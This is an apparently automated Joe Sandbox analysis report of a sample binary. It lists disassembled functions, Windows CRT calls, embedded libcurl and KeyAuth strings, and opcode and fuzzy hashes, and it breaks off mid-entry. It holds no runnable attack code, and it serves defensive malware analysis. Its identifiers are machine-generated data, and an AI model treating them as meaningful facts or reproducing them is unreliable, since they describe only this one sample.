                                            • Instruction Fuzzy Hash: 7051E521A0C78A51FA55BB2165307FAEA91AF45F80FD84436DE8E86790DF3CE855C332
                                            APIs
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A05584
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A0559A
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055AE
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055C2
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055D6
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055EA
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A055FE
                                              • Part of subcall function 00007FF7E5A05570: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A05612
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A04612
                                              • Part of subcall function 00007FF7E5A2E540: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E555
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E56F
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E58A
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5A6
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5C2
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5DA
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5F2
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E60A
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E622
                                              • Part of subcall function 00007FF7E5A2E540: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E63A
                                              • Part of subcall function 00007FF7E5A2E540: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E654
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A04816
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A04859
                                            • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7E5A0499E
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A04A1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$free$callocstrtoul
                                            • String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$file
                                            • API String ID: 954404409-4150109901
                                            • Opcode ID: 2ca85521c9ecdf955f9429382aae5dedbdb67b063789061bcb64614b8007046f
                                            • Instruction ID: 23f212ad91cab3e87fa17a483fc512eeb79533da9db57fcbb06cfb7156925592
                                            • Opcode Fuzzy Hash: 2ca85521c9ecdf955f9429382aae5dedbdb67b063789061bcb64614b8007046f
                                            • Instruction Fuzzy Hash: 4AC1A931B186C686FB64AA31D560BF9AB90FF45B48F84053ACB0DC7685DF3CE9548362
                                            APIs
                                              • Part of subcall function 00007FF7E59E2370: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2469
                                              • Part of subcall function 00007FF7E59E2370: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E24A8
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                              • Part of subcall function 00007FF7E59E3BB0: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF7E59E1D8B), ref: 00007FF7E59E3BF6
                                              • Part of subcall function 00007FF7E59E5DD0: memcpy.VCRUNTIME140(?,?,?,00007FF7E59E1DBA), ref: 00007FF7E59E5E61
                                              • Part of subcall function 00007FF7E59E3C30: memcpy.VCRUNTIME140 ref: 00007FF7E59E3C83
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2121
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2171
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E21C2
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2202
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2254
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2293
                                            • __std_exception_copy.VCRUNTIME140 ref: 00007FF7E59E22E6
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2337
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$memcpy$__std_exception_copy
                                            • String ID: parse error$parse_error
                                            • API String ID: 2484256320-1820534363
                                            • Opcode ID: 796c5f3307eb32e0ad6337efd212abd60be5357c1e3d7b385b4cd24bde934b85
                                            • Instruction ID: 86cdffc265e6bffb4efbf62cb8cbc1dcbfbe7f389c9fe811d23225db2a797114
                                            • Opcode Fuzzy Hash: 796c5f3307eb32e0ad6337efd212abd60be5357c1e3d7b385b4cd24bde934b85
                                            • Instruction Fuzzy Hash: CFB1A562B18B4985FF00EB64E4543AD77A1EB44BA8F905632DA6D82BE9DF7CD1C0C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc$_time64calloctolower
                                            • String ID: :%u$Shuffling %i addresses
                                            • API String ID: 133842801-338667637
                                            • Opcode ID: 1c6b2c5cffc96e1f2faa13328d5cbc488b8c058bf72ff2addcdcbf0fc35252f0
                                            • Instruction ID: 905cbe264694fe8d9c52453ce9ec7468ea06cd12c4809318fcb1eb31def17637
                                            • Opcode Fuzzy Hash: 1c6b2c5cffc96e1f2faa13328d5cbc488b8c058bf72ff2addcdcbf0fc35252f0
                                            • Instruction Fuzzy Hash: 2771C772718A4A81EB14AB21E564BBDABA0FF48F98F844532DE4E87790DF3CD445C712
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfree
                                            • String ID: GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                                            • API String ID: 1865132094-1312055526
                                            • Opcode ID: eedddef45915e7ee78f04db88568bb3b1bf7b9df837a40408026672cc07be263
                                            • Instruction ID: 5ae413e38f36b41917d27e718c87f61d963f9d536610dc616b12e78250a926d4
                                            • Opcode Fuzzy Hash: eedddef45915e7ee78f04db88568bb3b1bf7b9df837a40408026672cc07be263
                                            • Instruction Fuzzy Hash: C8719361B1868A80E760AF359470BBEAB91EF45F98F980032DF4D87695CF3DD4818762
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: CRAM-MD5$DIGEST-MD5$EXTERNAL$GSSAPI$LOGIN$NTLM$OAUTHBEARER$PLAIN$XOAUTH2
                                            • API String ID: 1294909896-1896214517
                                            • Opcode ID: bcc6fd5a38e36d593fabfc2fa539815a04fff9fc478c505d022e484110f194b5
                                            • Instruction ID: e70ecee9d524dbfa4a16d3749f760df70628280bc6bb1fe3935345cfc153a158
                                            • Opcode Fuzzy Hash: bcc6fd5a38e36d593fabfc2fa539815a04fff9fc478c505d022e484110f194b5
                                            • Instruction Fuzzy Hash: E7D16C62A09A8A85EB60DF10E450BADBBA1FF84B58F844137DE8C47798DF3CD445C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                            • API String ID: 2190258309-1670639106
                                            • Opcode ID: 529f760526342dc532923641d4e7bfe965fc7578af4e37c6f5efba9c0881beb6
                                            • Instruction ID: e075ca398427b7f582ebabddbcb0e63c14fb65104ea411d4a8709e97bc5ebb63
                                            • Opcode Fuzzy Hash: 529f760526342dc532923641d4e7bfe965fc7578af4e37c6f5efba9c0881beb6
                                            • Instruction Fuzzy Hash: 0AA18852B0868A85EB55AF25D560BB86F90FF44F98F841033DA8F87A95DF3CD490C362
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F0FB
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F161
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F16F
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F26D
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F2D6
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F2EE
                                              • Part of subcall function 00007FF7E5A2E240: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7E5A2E250
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F316
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F32D
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F352
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F39F
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A2F3B4
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F4FC
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F506
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F510
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F51A
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F524
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F52E
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F538
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F542
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F54C
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F556
                                              • Part of subcall function 00007FF7E5A2F4F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F560
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$calloc$_strdup
                                            • String ID: ,$:
                                            • API String ID: 2460172880-4193410690
                                            • Opcode ID: 720a0cab02216bd014dea907fac7775497998a3dfb4afdeff2ebf6ce69ee974d
                                            • Instruction ID: 5ca69b468ae21672e83ab4a46b1b0fd1c81e62d40bfa2d96be596ceb9a0e1a21
                                            • Opcode Fuzzy Hash: 720a0cab02216bd014dea907fac7775497998a3dfb4afdeff2ebf6ce69ee974d
                                            • Instruction Fuzzy Hash: 06518416F0C68A42F711AB359523BB9A750BF56F88F849236CE8EA1542EF7CF1C48711
                                            APIs
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E555
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E56F
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E58A
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5A6
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5C2
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5DA
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E5F2
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E60A
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E622
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E63A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A045B5,?,?,?,?,?,00007FF7E5A029BC), ref: 00007FF7E5A2E654
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup$callocfree
                                            • String ID:
                                            • API String ID: 1183638330-0
                                            • Opcode ID: b29704e7a7bafcfd67e48d247ff31038bc34b79da22b3b3364008b4691575eec
                                            • Instruction ID: 99dbc45cd1ffff1de6aabfca0407f115d16d4816cecb1ce1b722b0411824dff3
                                            • Opcode Fuzzy Hash: b29704e7a7bafcfd67e48d247ff31038bc34b79da22b3b3364008b4691575eec
                                            • Instruction Fuzzy Hash: 2C31F369B06B0782EE69AB55E471B3467D0BF44F50B584536CD0D92740EF3CE4A48371
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                            • API String ID: 0-1262176364
                                            • Opcode ID: 467d5c9c31773df116a706cbdf672d776cac5ef44452e7be24205e671929127c
                                            • Instruction ID: db8bf784f141487fb96a1624f5e89d283a31e0aad1cfdc8cb3fd31bfa5b3c9c2
                                            • Opcode Fuzzy Hash: 467d5c9c31773df116a706cbdf672d776cac5ef44452e7be24205e671929127c
                                            • Instruction Fuzzy Hash: 8F41F236B0865AC6FA20AB55E461BBDEB60EF41F80FC4403BCA4D97641DF7CE8448722
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,Digest,?,00007FF7E5A1450A), ref: 00007FF7E5A0851F
                                            • strchr.VCRUNTIME140(?,?,?,?,?,00000000,?,00000000,?,Digest,?,00007FF7E5A1450A), ref: 00007FF7E5A08571
                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,Digest,?,00007FF7E5A1450A), ref: 00007FF7E5A08595
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,Digest,?,00007FF7E5A1450A), ref: 00007FF7E5A085E5
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,Digest,?,00007FF7E5A1450A), ref: 00007FF7E5A08628
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupstrchr
                                            • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                            • API String ID: 153040452-3976116069
                                            • Opcode ID: 991cca11e921deaf2fb3f742e1aed303678f25a5ce7169caec8dc6d57ca1d1d1
                                            • Instruction ID: eb1d381cca0b3a77cf3b83dfd84910bd5e95d7565287dadeb16a15fce267900c
                                            • Opcode Fuzzy Hash: 991cca11e921deaf2fb3f742e1aed303678f25a5ce7169caec8dc6d57ca1d1d1
                                            • Instruction Fuzzy Hash: 1041A522718B8A92EA20AF11E450BAABBA0FF45F84F940036DE8D87794DF7CD556C315
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdup
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$FALSE$Public Key Algorithm$TRUE
                                            • API String ID: 2653869212-571364039
                                            • Opcode ID: 9dc0b852f7038322631c9ff623631b1be7e00c642b1ca7ddf154faf074b028e8
                                            • Instruction ID: af3d360e14ddc24590606a1c5f15aff01a001b63bc402f2a7daa4cae4f2e0d23
                                            • Opcode Fuzzy Hash: 9dc0b852f7038322631c9ff623631b1be7e00c642b1ca7ddf154faf074b028e8
                                            • Instruction Fuzzy Hash: CE416261B0978A85EB11AB61E464BFDABA1BF05B88FC40433CE4D97756DF3CE1448322
                                            APIs
                                            Strings
                                            Memory Dump Source
